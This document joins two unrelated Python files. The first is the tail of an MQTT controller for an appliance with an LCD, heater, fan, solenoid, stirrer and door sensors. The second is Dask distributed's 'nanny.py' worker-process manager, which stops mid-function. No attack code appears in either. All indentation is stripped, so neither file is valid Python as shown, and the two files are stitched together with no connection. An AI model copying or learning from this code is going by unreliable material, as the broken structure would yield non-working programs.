# displaySafeDoor(val_safe_door)
#
# elif (msg.topic == '/print_lcd_elapsed_time'):
# #print("topic: ", msg.topic)
# data = msg.payload.decode('utf-8').replace("'", '"')
# elapsed_time = json_to_val(data)
# elapsed_time = str(datetime.timedelta(seconds=elapsed_time))
# displayElapsed(elapsed_time)
elif (f_msg.topic == '/set_solenoid'):
#print("topic: ", f_msg.topic)
data = f_msg.payload.decode('utf-8').replace("'", '"')
solenoid_val = json_to_val(data)
solenoid(Sol_val, solenoid_val)
elif (f_msg.topic == '/set_fan'):
#print("topic: ", f_msg.topic)
data = f_msg.payload.decode('utf-8').replace("'", '"')
fan_val = json_to_val(data)
fan(Cooling_motor, fan_val)
elif (f_msg.topic == '/set_heater'):
#print("topic: ", f_msg.topic)
data = f_msg.payload.decode('utf-8').replace("'", '"')
heat_val, heat_val2, heat_val3 = json_to_val(data)
heater(Heat_12, Heat_3, Heat_4, heat_val, heat_val2, heat_val3)
elif (f_msg.topic == '/set_stirrer'):
#print("topic: ", f_msg.topic)
data = f_msg.payload.decode('utf-8').replace("'", '"')
stirrer_val = json_to_val(data)
stirrer(Mix_motor, stirrer_val)
# elif (f_msg.topic == '/set_buzzer'):
# #print("topic: ", f_msg.topic)
# buzzer_running = 1
# data = f_msg.payload.decode('utf-8').replace("'", '"')
# buzzer_val = json_to_val(data)
# buzzer(Buzzer, buzzer_val)
# buzzer_running = 0
# elif (f_msg.topic == '/set_zero_point'):
# #print("topic: ", f_msg.topic)
# data = f_msg.payload.decode('utf-8').replace("'", '"')
# set_ref_Unit, set_corr_val = json_to_val(data)
# #print('set_zero_point - ',set_ref_Unit, ', ', set_corr_val)
# set_ref_Unit = float(set_ref_Unit)
# correlation_value = float(set_corr_val)
# set_factor(set_ref_Unit)
else:
q.put_nowait(f_msg)
#q.put(f_msg)
def on_message(client, userdata, _msg):
# if(msg.topic == '/print_lcd_output_door'):
# g_print_lcd_output_door_topic = msg.topic
# g_print_lcd_output_door_msg = msg.payload.decode('utf-8').replace("'", '"')
#
# elif(msg.topic == '/print_lcd_safe_door'):
# g_print_lcd_safe_door_topic = msg.topic
# g_print_lcd_safe_door_msg = msg.payload.decode('utf-8').replace("'", '"')
#
# else:
func_set_q(_msg)
#-----------------------------------------------------------------------
#---INIT LCD & Display Message------------------------------------------
def lcd_init():
lcd_columns = 20
lcd_rows = 4
i2c = busio.I2C(board.SCL, board.SDA)
lcd = character_lcd.Character_LCD_I2C(i2c, lcd_columns, lcd_rows)
lcd.backlight = True
return lcd
def displayState(msg1):
print(msg1)
if (len(str(msg1)) > 5):
msg1 = str(msg1)
msg1 = msg1[0:5]
try:
if (msg1 == 'DEBUG'):
g_lcd.clear()
g_lcd.cursor_position(0,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,0)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
if (msg1 == 'DEBUG'):
g_lcd.clear()
g_lcd.cursor_position(0,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,0)
g_lcd.message = f'{msg1}'
def displayTemp(msg1, msg2):
if (len(str(msg1)) > 5):
msg1 = str(msg1)
msg1 = msg1[0:5]
elif (len(str(msg2)) > 5):
msg2 = str(msg2)
msg2 = msg2[0:5]
try:
g_lcd.cursor_position(8,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(8,0)
g_lcd.message = f'{msg1}'
g_lcd.cursor_position(14,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(14,0)
g_lcd.message = f'{msg2}'
except OSError:
lcd_init()
g_lcd.cursor_position(8,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(8,0)
g_lcd.message = f'{msg1}'
g_lcd.cursor_position(14,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(14,0)
g_lcd.message = f'{msg2}'
def displayLoadcell(msg1, msg2):
if (len(str(msg1)) > 5):
msg1 = str(msg1)
msg1 = msg1[0:5]
elif (len(str(msg2)) > 5):
msg2 = str(msg2)
msg2 = msg2[0:5]
try:
g_lcd.cursor_position(0,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,1)
g_lcd.message = f'{msg1}'
g_lcd.cursor_position(10,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(10,1)
g_lcd.message = f'{msg2}'
except OSError:
lcd_init()
g_lcd.cursor_position(0,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,1)
g_lcd.message = f'{msg1}'
g_lcd.cursor_position(10,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(10,1)
g_lcd.message = f'{msg2}'
def displayLoadcellFactor(msg1):
if (len(str(msg1)) > 6):
msg1 = str(msg1)
msg1 = msg1[0:6]
try:
g_lcd.cursor_position(14,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(14,1)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(14,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(14,1)
g_lcd.message = f'{msg1}'
def displayInputDoor(msg1):
if (len(str(msg1)) > 1):
msg1 = str(msg1)
msg1 = msg1[0:1]
try:
g_lcd.cursor_position(15,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(15,2)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(15,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(15,2)
g_lcd.message = f'{msg1}'
def displayOutputDoor(msg1):
if (len(str(msg1)) > 1):
msg1 = str(msg1)
msg1 = msg1[0:1]
try:
g_lcd.cursor_position(17,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(17,2)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(17,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(17,2)
g_lcd.message = f'{msg1}'
def displaySafeDoor(msg1):
if (len(str(msg1)) > 1):
msg1 = str(msg1)
msg1 = msg1[0:1]
try:
g_lcd.cursor_position(19,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(19,2)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(19,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(19,2)
g_lcd.message = f'{msg1}'
def displayElapsed(msg1):
if (len(str(msg1)) > 8):
msg1 = str(msg1)
msg1 = msg1[0:8]
try:
g_lcd.cursor_position(0,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,2)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(0,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,2)
g_lcd.message = f'{msg1}'
def displayMsg(msg1):
if (len(str(msg1)) > 20):
msg1 = str(msg1)
msg1 = msg1[0:20]
try:
g_lcd.cursor_position(0,3)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,3)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(0,3)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,3)
g_lcd.message = f'{msg1}'
#-----------------------------------------------------------------------
#=======================================================================
global dry_client
broker_address = "localhost"
port = 1883
global g_lcd
g_lcd = lcd_init()
dry_client = mqtt.Client()
dry_client.on_connect = on_connect
dry_client.on_disconnect = on_disconnect
dry_client.on_subscribe = on_subscribe
dry_client.on_message = on_message
dry_client.connect(broker_address, port)
dry_client.subscribe("/print_lcd_internal_temp")
dry_client.subscribe("/print_lcd_state")
dry_client.subscribe("/print_lcd_debug_message")
dry_client.subscribe("/print_lcd_loadcell")
dry_client.subscribe("/print_lcd_loadcell_factor")
dry_client.subscribe("/print_lcd_elapsed_time")
dry_client.subscribe("/print_lcd_input_door")
dry_client.subscribe("/print_lcd_output_door")
dry_client.subscribe("/print_lcd_safe_door")
dry_client.subscribe("/req_zero_point")
dry_client.subscribe("/req_internal_temp")
dry_client.subscribe("/req_debug_mode")
dry_client.subscribe("/req_start_btn")
dry_client.subscribe("/req_calc_factor")
dry_client.subscribe("/req_input_door")
dry_client.subscribe("/req_output_door")
dry_client.subscribe("/req_safe_door")
dry_client.subscribe("/req_weight")
dry_client.subscribe("/req_operation_mode")
dry_client.subscribe("/set_solenoid")
dry_client.subscribe("/set_fan")
dry_client.subscribe("/set_heater")
dry_client.subscribe("/set_stirrer")
dry_client.subscribe("/set_buzzer")
dry_client.subscribe("/set_zero_point")
dry_client.loop_start()
global correlation_value
correlation_value = 0
loadcell_param = {"factor":6555,"correlation_value":200}
if (os. path.isfile("./factor.json") == False):
with open("./factor.json","w") as refUnit_json:
json.dump(loadcell_param, refUnit_json)
loadcell_factor = loadcell_param['factor']
else:
with open ("./factor.json", 'r') as refUnit_json:
loadcell_factor = json.load(refUnit_json)
loadcell_factor = loadcell_factor['factor']
init_loadcell(loadcell_factor)
global ser
ser = serial.Serial("/dev/ttyAMA0", 9600)
global set_ref_Unit
set_ref_Unit = 1
weight_arr = [0, 0, 0, 0, 0]
flag = 0
def mqtt_dequeue(q):
while True:
if not q.empty():
try:
recv_msg = q.get(False)
g_recv_topic = recv_msg.topic
print(g_recv_topic)
if (g_recv_topic == '/req_internal_temp'):
#print("topic: ", g_recv_topic)
temperature = get_temp()
dry_client.publish("/res_internal_temp", temperature)
elif (g_recv_topic == '/req_zero_point'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
reference_weight = json.loads(data)
reference_weight = reference_weight['val']
#print ("reference_weight: ", reference_weight)
val = ref_weight(reference_weight)
dry_client.publish("/res_zero_point", val)
elif (g_recv_topic == '/req_calc_factor'):
#print("topic: ", g_recv_topic)
calc_referenceUnit = calc_ref_Unit(reference_weight, set_ref_Unit)
dry_client.publish("/res_calc_factor", calc_referenceUnit)
elif (g_recv_topic == '/req_weight'):
#print("topic: ", g_recv_topic)
weight = get_loadcell()
#print(weight)
dry_client.publish("/res_weight", weight)
elif (g_recv_topic == '/print_lcd_internal_temp'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
top, bottom = json_to_val(data)
#print ('print_lcd: ', top, ' ', bottom)
displayTemp(top, bottom)
elif (g_recv_topic == '/print_lcd_state'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
state = json_to_val(data)
displayState(state)
print('print_lcd_state')
elif (g_recv_topic == '/print_lcd_debug_message'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
debug = json_to_val(data)
#print (debug)
displayMsg(debug)
print('print_lcd_debug_message')
elif (g_recv_topic == '/print_lcd_loadcell'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
loadcell, target_loadcell = json_to_val(data)
loadcell = str(loadcell)
#print(loadcell, ' ', target_loadcell)
target_loadcell = str(target_loadcell)
#loadcell = (loadcell[2:(len(loadcell)-5)])
#target_loadcell = (target_loadcell[2:(len(target_loadcell)-5)])
displayLoadcell(loadcell, target_loadcell)
elif (g_recv_topic == '/print_lcd_loadcell_factor'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
loadcell_factor, corr_val = json_to_val(data)
displayLoadcellFactor(loadcell_factor)
elif (g_recv_topic == '/print_lcd_input_door'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
input_door = json_to_val(data)
displayInputDoor(input_door)
elif (g_recv_topic == '/print_lcd_output_door'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
output_door = json_to_val(data)
displayOutputDoor(output_door)
print('print_lcd_output_door')
elif (g_recv_topic == '/print_lcd_safe_door'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
val_safe_door = json_to_val(data)
displaySafeDoor(val_safe_door)
elif (g_recv_topic == '/print_lcd_elapsed_time'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
elapsed_time = json_to_val(data)
elapsed_time = str(datetime.timedelta(seconds=elapsed_time))
displayElapsed(elapsed_time)
# elif (g_recv_topic == '/set_solenoid'):
# #print("topic: ", g_recv_topic)
# data = recv_msg.payload.decode('utf-8').replace("'", '"')
# solenoid_val = json_to_val(data)
# solenoid(Sol_val, solenoid_val)
#
# elif (g_recv_topic == '/set_fan'):
# #print("topic: ", g_recv_topic)
# data = recv_msg.payload.decode('utf-8').replace("'", '"')
# fan_val = json_to_val(data)
# fan(Cooling_motor, fan_val)
#
# elif (g_recv_topic == '/set_heater'):
# #print("topic: ", g_recv_topic)
# data = recv_msg.payload.decode('utf-8').replace("'", '"')
# heat_val, heat_val2, heat_val3 = json_to_val(data)
# heater(Heat_12, Heat_3, Heat_4, heat_val, heat_val2, heat_val3)
#
# elif (g_recv_topic == '/set_stirrer'):
# #print("topic: ", g_recv_topic)
# data = recv_msg.payload.decode('utf-8').replace("'", '"')
# stirrer_val = json_to_val(data)
# stirrer(Mix_motor, stirrer_val)
elif (g_recv_topic == '/set_buzzer'):
#print("topic: ", g_recv_topic)
buzzer_running = 1
data = recv_msg.payload.decode('utf-8').replace("'", '"')
buzzer_val = json_to_val(data)
buzzer(Buzzer, buzzer_val)
buzzer_running = 0
elif (g_recv_topic == '/set_zero_point'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
set_ref_Unit, set_corr_val = json_to_val(data)
#print('set_zero_point - ',set_ref_Unit, ', ', set_corr_val)
set_ref_Unit = float(set_ref_Unit)
correlation_value = float(set_corr_val)
set_factor(set_ref_Unit)
except Empty:
continue
q.task_done()
def core_func(q):
period = 10000
while_count = 0
while True:
while_count = while_count + 1
#print(while_count)
if ((while_count % period) == 0):
deb = debug_mode(Debug_switch_pin)
dry_client.publish("/res_debug_mode", deb)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
sw4_json = start_btn(SW4_pin)
dry_client.publish("/res_start_btn", sw4_json)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
json_input_door = get_input_door(Input_Door_pin)
#print('input door: ', json_input_door)
dry_client.publish("/res_input_door", json_input_door)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
json_output_door = get_output_door(Output_Door_pin)
#print("output door: ", json_output_door)
dry_client.publish("/res_output_door", json_output_door)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
json_safe_door = get_safe_door(Safe_Door_pin)
#print("safe door: ", json_safe_door)
dry_client.publish("/res_safe_door", json_safe_door)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
json_operation_mode = Operation(Select_SW)
#print("operation: ", json_operation_mode)
dry_client.publish("/res_operation_mode", json_operation_mode)
# if (g_print_lcd_output_door_topic == '/print_lcd_output_door'):
# output_door = json_to_val(g_print_lcd_output_door_msg)
# displayOutputDoor(output_door)
# print('print_lcd_output_door')
# g_print_lcd_output_door_topic = ''
#
# elif (g_print_lcd_safe_door_topic == '/print_lcd_safe_door'):
# val_safe_door = json_to_val(g_print_lcd_safe_door_msg)
# displaySafeDoor(val_safe_door)
# print('print_lcd_safe_door')
# g_print_lcd_safe_door_topic = ''
#g_lcd.backlight = True
from multiprocessing import Process
def main():
p1 = Process(target=mqtt_dequeue, args=(q,))
p1.start()
p2 = Process(target=core_func, args=(q,))
p2.start()
p1.join()
p2.join()
if __name__ == "__main__":
main()
|
nanny.py | from __future__ import annotations
import asyncio
import errno
import logging
import os
import shutil
import threading
import uuid
import warnings
import weakref
from contextlib import suppress
from inspect import isawaitable
from queue import Empty
from time import sleep as sync_sleep
from typing import ClassVar
import psutil
from tornado import gen
from tornado.ioloop import IOLoop, PeriodicCallback
import dask
from dask.system import CPU_COUNT
from dask.utils import parse_timedelta
from . import preloading
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import CommClosedError, RPCClosed, Status, coerce_to_address, error_message
from .diagnostics.plugin import _get_plugin_name
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .protocol import pickle
from .security import Security
from .utils import (
TimeoutError,
get_ip,
json_load_robust,
log_errors,
mp_context,
parse_ports,
silence_logging,
)
from .worker import Worker, parse_memory_limit, run
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
"""A process to manage worker processes
The nanny spins up Worker processes, watches then, and kills or restarts
them as necessary. It is necessary if you want to use the
``Client.restart`` method, or to restart the worker automatically if
it gets to the terminate fraction of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker
with exceptions listed below.
Parameters
----------
env: dict, optional
Environment variables set at time of Nanny initialization will be
ensured to be set in the Worker process as well. This argument allows to
overwrite or otherwise set environment variables for the Worker. It is
also possible to set environment variables using the option
`distributed.nanny.environ`. Precedence as follows
1. Nanny arguments
2. Existing environment variables
3. Dask configuration
See Also
--------
Worker
"""
_instances: ClassVar[weakref.WeakSet[Nanny]] = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
self._original_local_dir = local_directory
local_directory = os.path.join(local_directory, "dask-worker-space")
else:
self._original_local_dir = local_directory
self.local_directory = local_directory
if not os.path.exists(self.local_directory):
os.makedirs(self.local_directory, exist_ok=True)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.Worker = Worker if worker_class is None else worker_class
config_environ = dask.config.get("distributed.nanny.environ", {})
if not isinstance(config_environ, dict):
raise TypeError(
f"distributed.nanny.environ configuration must be of type dict. Instead got {type(config_environ)}"
)
self.env = config_environ.copy()
for k in self.env:
if k in os.environ:
self.env[k] = os.environ[k]
if env:
self.env.update(env)
self.env = {k: str(v) for k, v in self.env.items()}
self.config = config or dask.config.config
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side for naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
"plugin_add": self.plugin_add,
"plugin_remove": self.plugin_remove,
}
self.plugins = {}
super().__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
"""For API compatibility with Nanny"""
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
"""Start nanny, start local process, start watching"""
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise
else:
self._start_address = start_address
break
else:
raise ValueError(
f"Could not start Nanny on host {self._start_host}"
f"with port {self._start_port}"
)
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
msg = await self.scheduler.register_nanny()
for name, plugin in msg["nanny-plugins"].items():
await self.plugin_add(plugin=plugin, name=name)
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == Status.running:
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
"""Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = time() + timeout
await self.process.kill(timeout=0.8 * (deadline - time()))
async def instantiate(self, comm=None) -> Status:
"""Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self._original_local_dir,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
try:
result = await self.process.start()
except Exception:
await self.close()
raise
return result
async def plugin_add(self, comm=None, plugin=None, name=None):
with log_errors(pdb=False):
if isinstance(plugin, bytes):
plugin = pickle.loads(plugin)
if name is None:
name = _get_plugin_name(plugin)
assert name
self.plugins[name] = plugin
logger.info("Starting Nanny plugin %s" % name)
if hasattr(plugin, "setup"):
try:
result = plugin.setup(nanny=self)
if isawaitable(result):
result = await result
except Exception as e:
msg = error_message(e)
return msg
if getattr(plugin, "restart", False):
await self.restart()
return {"status": "OK"}
async def plugin_remove(self, comm=None, name=None):
with log_errors(pdb=False):
logger.info(f"Removing Nanny plugin {name}")
try:
plugin = self.plugins.pop(name)
if hasattr(plugin, "teardown"):
result = plugin.teardown(nanny=self)
if isawaitable(result):
result = await result
except Exception as e:
msg = error_message(e)
return msg
return {"status": "OK"}
async def restart(self, comm=None, timeout=30, executor_wait=True):
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error(
f"Restart timed out after {timeout}s; returning before finished"
)
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
"""Track worker's memory. Restart if it goes above terminate fraction"""
if self.status != Status.running:
return
if self.process is None or self.process.process is None:
return None
process = self.process.process
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (
Status.init,
Status.closing,
Status.closed,
Status.closing_gracefully,
):
try:
await self._unregister()
except OSError:
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
teardowns = [
plugin.teardown(self)
for plugin in self.plugins.values()
if hasattr(plugin, "teardown")
]
await asyncio.gather(*(td for td in teardowns if isawaitable(td)))
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await super().close()
async def _log_event(self, topic, msg):
await self.scheduler.log_event(
topic=topic,
msg=msg,
)
def log_event(self, topic, msg):
self.loop.add_callback(self._log_event, topic, msg)
class WorkerProcess:
running: asyncio.Event
stopped: asyncio.Event
# The interval how often to check the msg queue for init
_init_msg_interval = 0.05
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self) -> Status:
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
self.status = Status.failed
return self.status
try:
msg = await self._wait_until_connected(uid)
except Exception:
self.status = Status.failed
self.process.terminate()
raise
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = Status.running
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
